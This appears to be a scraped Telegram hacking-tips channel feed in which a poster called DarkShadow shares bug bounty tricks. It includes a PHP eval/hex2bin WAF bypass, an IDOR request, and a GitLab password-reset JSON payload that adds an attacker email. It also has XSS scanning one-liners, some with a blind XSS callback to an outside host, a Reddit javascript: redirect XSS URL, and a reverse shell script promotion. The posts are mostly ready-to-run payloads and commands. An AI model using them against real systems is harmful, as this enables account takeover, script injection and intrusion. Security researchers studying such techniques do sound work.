Guys, I just bypassed a seriously tough WAF + IDS combo!
Let me give you a quick summary of the bypass journey:
While testing a WordPress setup, I noticed that it blocks any attempt to save PHP code using the standard <?php ?> tags β access denied right away.
So, I tried using the shorthand <?= ?>, and surprisingly⦠it got through!
However, the IDS was still smart enough to detect and block any dangerous functions β even if they were Base64 encoded.
I experimented with multiple obfuscation methods, but none of them worked⦠until I had a breakthrough!
πThe trick? I used hex2bin() in combination with eval() β and that finally bypassed both the WAF and IDS.π₯
Want the payload/code? Let me know β
And don't forget to follow me ππΌ DarkShadow
#wafbypass
Let me give you a quick summary of the bypass journey:
While testing a WordPress setup, I noticed that it blocks any attempt to save PHP code using the standard <?php ?> tags β access denied right away.
So, I tried using the shorthand <?= ?>, and surprisingly⦠it got through!
However, the IDS was still smart enough to detect and block any dangerous functions β even if they were Base64 encoded.
I experimented with multiple obfuscation methods, but none of them worked⦠until I had a breakthrough!
πThe trick? I used hex2bin() in combination with eval() β and that finally bypassed both the WAF and IDS.π₯
Want the payload/code? Let me know β
And don't forget to follow me ππΌ DarkShadow
#wafbypass
π«‘35π₯8π7β€4
Perfect for anyone involved in:
Brut SecurityTake advantage of this opportunity and explore ZoomEyeβs premium features!
#BrutSecurity #ZoomEye
Please open Telegram to view this post
VIEW IN TELEGRAM
2β€14π₯4π3
Hey, donβt forget to like and share! And if you give it a try, tell us β weβd love to know how youβre using it!
β€12π7
π‘ IDOR Bypass Bug Bounty Tip
Sometimes APIs behave unexpectedly when multiple IDs are passed together.
π Scenario
β’ Victimβs ID: 5200
β’ Attackerβs ID: 5233
π« GET /api/users/5200/info β Access Denied
β GET /api/users/5200,5233/info β Bypass Successful
π Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!
#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
Sometimes APIs behave unexpectedly when multiple IDs are passed together.
π Scenario
β’ Victimβs ID: 5200
β’ Attackerβs ID: 5233
π« GET /api/users/5200/info β Access Denied
β GET /api/users/5200,5233/info β Bypass Successful
π Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!
#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
π₯28π12β€10π2
Please open Telegram to view this post
VIEW IN TELEGRAM
π11β€5π₯1
Brut Security
Password Reset Bypass Trick π Some poorly secured endpoints accept multiple email parameters.π³ Try this: POST /passwordReset HTTP/1.1 Content-Type: application/x-www-form-urlencoded [email protected]&[email protected] Or in JSON: {β¦
Hey Hunters,
DarkShadow is back again with another POC that earned $35,000 ππΌ
π₯ GitLab Password Reset via Account Takeover Vulnerability π¬
This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email π€―
β POC Request:
I was shared this same method a long time ago π
Don't forget to follow me ππΌ DarkShadow
DarkShadow is back again with another POC that earned $35,000 ππΌ
π₯ GitLab Password Reset via Account Takeover Vulnerability π¬
This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email π€―
β POC Request:
"user": {
"email": [
"[email protected]",
"[email protected]"
]
}
I was shared this same method a long time ago π
Don't forget to follow me ππΌ DarkShadow
πΏ16π₯11β€6π6π±3
Hey Hunters,
DarkShadow hereβback again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellβno more manual payload hunting!
Let me know if you needπ
DarkShadow hereβback again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shellβno more manual payload hunting!
Let me know if you needπ
π₯19π7π³2
More tools, tips, and hacking content coming your way!
Stay connected with us β the journey has just begun.
Donβt forget to like and share!
Please open Telegram to view this post
VIEW IN TELEGRAM
2π25β€11π₯4
Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commandsπ
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
2. Gospider + Dalfox
4. Gospider + Dalfox (Deep Crawl)
Required tools are:
If you find this helpful and want more cutting-edge tips and tricks, donβt forget to follow me ππΌ DarkShadow
#bugbountytips #xss
DarkShadow here back again, dropping some one-liner killer XSS commandsπ
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
2. Gospider + Dalfox
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe3. Wayback + GF + Blind XSS via Dalfox
waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe
4. Gospider + Dalfox (Deep Crawl)
gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt5. Dalfox Direct with Blind XSS
cat urls.txt | dalfox pipe -b yourdomain.xss
Required tools are:
httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox
If you find this helpful and want more cutting-edge tips and tricks, donβt forget to follow me ππΌ DarkShadow
#bugbountytips #xss
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯13π7π5π¨βπ»3
Good morning hacker's,
Let's start morning to hack Reddit account π
Let's start morning to hack Reddit account π
π11π«‘2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letβs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereβs the twist...
β PoC Steps (Super Simple):
Boomπ₯. Thatβs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation β just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donβt forget to react, share, and follow me in X
ππΌ DarkShadow
#bugbountytips #xss
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letβs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereβs the twist...
β PoC Steps (Super Simple):
https://www.reddit.com/login/?dest=javascript:alert(document.domain)
Boomπ₯. Thatβs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation β just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donβt forget to react, share, and follow me in X
ππΌ DarkShadow
#bugbountytips #xss
π18π10π₯7πΏ4β€2
Who are you in the world of cybersecurity?
Anonymous Poll
42%
Beginner β currently learning cybersecurity π
25%
Bug bounty hunter β actually reporting vulnerabilities π₯
7%
Red teamer β simulating real-world attacks to improve defenses π₯
15%
Professional Pentester β Working in a cybersecurity job role β¨
11%
Black hat hacker β unauthorized hacking β οΈ
π₯11π³8β€1π1
Hey Hunter's,
DarkShadow here back again, dropping a killer trick π
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me ππΌ DarkShadow
DarkShadow here back again, dropping a killer trick π
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me ππΌ DarkShadow
π₯22π7β€3π3π³1π¨βπ»1π«‘1
https://github.com/NazaninNazari/Origin_ReconPlease open Telegram to view this post
VIEW IN TELEGRAM
π19π₯10
Forwarded from Brut Security 2.0
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯10